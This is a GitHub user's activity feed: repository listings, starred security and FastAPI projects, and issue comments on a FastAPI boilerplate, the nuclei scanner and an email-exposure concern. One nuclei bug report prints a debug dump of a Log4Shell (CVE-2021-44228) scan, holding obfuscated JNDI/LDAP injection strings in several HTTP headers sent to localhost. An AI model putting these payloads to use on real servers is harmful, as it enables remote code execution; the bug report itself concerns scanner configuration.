profile
viewpoint

am1ru1/APTnotes 0

Various public documents, whitepapers and articles about APT campaigns

am1ru1/awesome-python 0

A curated list of awesome Python frameworks, libraries and software. Inspired by awesome-php.

am1ru1/AWS-SAA-C02-Course 0

Personal notes for SAA-C02 test from: https://learn.cantrill.io

am1ru1/backsnakes 0

A python backdoor for COMP 8505 final project for use on Linux systems

am1ru1/chalice 0

Python Serverless Microframework for AWS

am1ru1/concordance 0

Term concordances for each course in the SANS DFIR curriculum. Used for automated index generation.

am1ru1/dat 0

real-time replication and versioning for data sets.

am1ru1/decode_gws 0

a decoder for (old) DLINK routers

am1ru1/deepdarkCTI 0

Collection of Cyber Threat Intelligence sources from the deep and dark web

starteddimmaski/fastapi-sam-poc

started time in a day

startedSaltStackExperiments/servicenow_utils

started time in 5 days

startedinfosecn1nja/AD-Attack-Defense

started time in 5 days

startedsaurabh210/AutomatingCloud

started time in 5 days

starteddsaccon/fec

started time in 12 days

issue commentttymck/fastapi-fullstack-boilerplate

No such file or directory - cache_manifest.json

From the settings.py, the path is correctly translated. STATIC_DIR = APP_ROOT / "static"

However there is no _digest nor the cache_manifest within the path: static

Did you manually create the folder and file?

am1ru1

comment created time in 15 days

issue openedttymck/fastapi-fullstack-boilerplate

No such file or directory - cache_manifest.json

@ttymck looks like a a great code. However I am getting the following error on the first, wanna check if you might know the fix? Tried googling, not much help.

((fastapi-fullstack-boilerplate) ) coder@MYSERVER:~/mynotes/fastapi/fastapi-fullstack-boilerplate$ uvicorn --factory app.main:create_app --reload --port=8080
INFO:     Will watch for changes in these directories: ['/home/coder/mynotes/fastapi/fastapi-fullstack-boilerplate']
INFO:     Uvicorn running on http://127.0.0.1:8080 (Press CTRL+C to quit)
INFO:     Started reloader process [31471] using statreload
Process SpawnProcess-1:
Traceback (most recent call last):
  File "/usr/lib/python3.8/multiprocessing/process.py", line 315, in _bootstrap
    self.run()
  File "/usr/lib/python3.8/multiprocessing/process.py", line 108, in run
    self._target(*self._args, **self._kwargs)
  File "/home/coder/.local/share/virtualenvs/fastapi-fullstack-boilerplate-IipA4anG/lib/python3.8/site-packages/uvicorn/subprocess.py", line 76, in subprocess_started
    target(sockets=sockets)
  File "/home/coder/.local/share/virtualenvs/fastapi-fullstack-boilerplate-IipA4anG/lib/python3.8/site-packages/uvicorn/server.py", line 68, in run
    return asyncio.run(self.serve(sockets=sockets))
  File "/usr/lib/python3.8/asyncio/runners.py", line 44, in run
    return loop.run_until_complete(main)
  File "/usr/lib/python3.8/asyncio/base_events.py", line 616, in run_until_complete
    return future.result()
  File "/home/coder/.local/share/virtualenvs/fastapi-fullstack-boilerplate-IipA4anG/lib/python3.8/site-packages/uvicorn/server.py", line 76, in serve
    config.load()
  File "/home/coder/.local/share/virtualenvs/fastapi-fullstack-boilerplate-IipA4anG/lib/python3.8/site-packages/uvicorn/config.py", line 454, in load
    self.loaded_app = self.loaded_app()
  File "/home/coder/mynotes/fastapi/fastapi-fullstack-boilerplate/./app/main.py", line 53, in create_app
    static_digest = StaticDigest(source_dir=settings.STATIC_DIR)
  File "/home/coder/.local/share/virtualenvs/fastapi-fullstack-boilerplate-IipA4anG/lib/python3.8/site-packages/fastapi_static_digest/digest.py", line 51, in __init__
    self.manifest = self._load_manifest()
  File "/home/coder/.local/share/virtualenvs/fastapi-fullstack-boilerplate-IipA4anG/lib/python3.8/site-packages/fastapi_static_digest/digest.py", line 54, in _load_manifest
    with open(self.manifest_file, "r") as f:
FileNotFoundError: [Errno 2] No such file or directory: '/home/coder/mynotes/fastapi/fastapi-fullstack-boilerplate/app/static/_digest/cache_manifest.json'

Here are my steps:

pip install pipenv
pipenv shell
pipenv install --dev
uvicorn --factory app.main:create_app --reload --port=8080

created time in 15 days

startedBuuntu/fastapi-react

started time in 15 days

startedmjhea0/awesome-fastapi

started time in 15 days

startedtsitsimis/lazy-stack

started time in 15 days

startedarthurhenrique/cookiecutter-fastapi

started time in 19 days

startedNimishVerma/ServerlessFastapiPoetry

started time in 19 days

startedjhseceng/se-cwp-demo

started time in 24 days

startedSapphire-Health/ansible-crowdstrike

started time in 24 days

startedStoicSun/Notes

started time in 24 days

startedwoodpecker-appstore/log4j-payload-generator

started time in a month

issue commentprojectdiscovery/nuclei

interactsh-token parameter override returning Client.Timeout exceeded while awaiting headers

@am1ru1 that's not the correct way to use -itoken flag, it's an option for providing authentication token in case you are using your self-hosted interactsh server with token protection, in this case, interactsh.com or interact.sh is public interactsh server.

In fact, you don't need to feed any token or any additional flag related to interactsh as nuclei have inbuilt interactsh client integration into it.

so running nuclei -t cves/2021/CVE-2021-44228.yaml -l local-url.txt should be sufficient.

Yes I think the default interactsh is working. However the intention is that I want to use the web based interactsh (https://app.interactsh.com/#/) which will return the custom token that I need to pass to my tool. Is the parameter not meant to define the custom token and the web based client is interactsh.com service. So this should work?

am1ru1

comment created time in a month

issue openedprojectdiscovery/nuclei

interactsh-token parameter override returning Client.Timeout exceeded while awaiting headers

Nuclei version: 2.5.5

<!-- You can find current version of nuclei with "nuclei -version" --> <!-- We only accept issues that are reproducible on the latest version of nuclei. --> <!-- You can find the latest version of project at https://github.com/projectdiscovery/nuclei/releases/ -->

Current Behavior: -interactsh-token override returning "Client.Timeout exceeded while awaiting headers"

<!-- A concise description of what you're experiencing. -->

Expected Behavior: Providing -interactsh-token value obtained from https://app.interactsh.com/#/ should not return error and process the scan

<!-- A concise description of what you expected to happen. -->

Steps To Reproduce:

  1. Generate new token from https://app.interactsh.com/#/
  2. Run 'nuclei -t cves/2021/CVE-2021-44228.yaml -debug -itoken c6wegkt2vtc0000rz3h0gdq8ejhyyyyyb.interactsh.com -l local-url.txt -iserver "https://interactsh.com'
  3. See error '[ERR] Could not initialize interactsh client: could not create client: could not make register request: POST https://interactsh.com/register giving up after 6 attempts: Post "https://interactsh.com/register": context deadline exceeded (Client.Timeout exceeded while awaiting headers)'
  4. Observed very slow run compared to default interactsh.com without defining custom token and server
  5. Observed no result at https://app.interactsh.com/#/ <!-- Example: steps to reproduce the behavior:
  6. Run 'nuclei -t ... -u ..'
  7. See error... -->

Anything else:

$ nuclei -t cves/2021/CVE-2021-44228.yaml -debug -itoken c6wegkt2vtc0000rz3h0gdq8ejhyyyyyb.interactsh.com -l local-url.txt -iserver "https://interactsh.com"

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   2.5.5

                projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.5.5 (latest)
[INF] Using Nuclei Templates 8.7.3 (latest)
[INF] Using Interactsh Server https://interactsh.com
[INF] Templates added in last update: 363
[INF] Templates loaded for scan: 1


[ERR] Could not initialize interactsh client: could not create client: could not make register request: POST https://interactsh.com/register giving up after 6 attempts: Post "https://interactsh.com/register": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[INF] [CVE-2021-44228] Dumped HTTP request for http://localhost:8686

GET /?x=${jndi:ldap://${hostName}./a} HTTP/1.1
Host: localhost:8686
User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.}
Connection: close
Authentication: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.}
Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.}
X-Forwarded-For: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.}
Accept-Encoding: gzip

[DBG] [CVE-2021-44228] Dumped HTTP response for http://localhost:8686/?x=${jndi:ldap://${hostName}./a}

HTTP/1.1 400
Connection: close
Content-Length: 435
Content-Language: en
Content-Type: text/html;charset=utf-8
Date: Tue, 14 Dec 2021 19:05:03 GMT

<!doctype html><html lang="en"><head><title>HTTP Status 400 – Bad Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 – Bad Request</h1></body></html>
[INF] No results found. Better luck next time!

<!-- Links? References? Screenshots? Anything that will give us more context about the issue that you are encountering! -->

created time in a month

startedw33knd/yet-another-vps-install

started time in a month

startedKingOfBugbounty/DockerHunt

started time in a month

pull request commentfullhunt/log4j-scan

Specify URL and Token for DNS Callback Provider interactsh

The PR seems to be working fine. Though I have to change from interact.sh to interactsh.com.

@denniskniep : would you know how to use the web version(https://app.interactsh.com/#/)? I am using the token from the web version, but the result is not showing on the web gui. It does return the result in the CLI though

denniskniep

comment created time in a month

startedCrowdStrike/falcon-linux-install-bash

started time in a month

startedCrowdStrike/Cloud-AWS

started time in a month

startednetbiosX/Checklists

started time in a month

startedStackExchange/dnscontrol

started time in 2 months

startedsplunk/splunk-ansible

started time in 2 months

startedsplunk/ansible-role-for-splunk

started time in 2 months

issue closedtodogroup/governance

Concern on the email addresses harvested for spam

From concerned external party, the email addresses inside https://github.com/todogroup/governance/blob/master/MEMBERS.csv seems like a solid target for spammer. Consider making it private, masking, hash it or image-tize it.

Example: https://github.com/maldevel/EmailHarvester https://www.atompark.com/web-email-extractor/free-email-lists/

closed time in 2 months

am1ru1

issue openedtodogroup/governance

Concern on the email addresses harvested for spam

From concerned external party, the email addresses inside https://github.com/todogroup/governance/blob/master/MEMBERS.csv seems like a solid target for spammer. Consider making it private, masking, hash it or image-tize it.

Example: https://github.com/maldevel/EmailHarvester https://www.atompark.com/web-email-extractor/free-email-lists/

created time in 2 months

more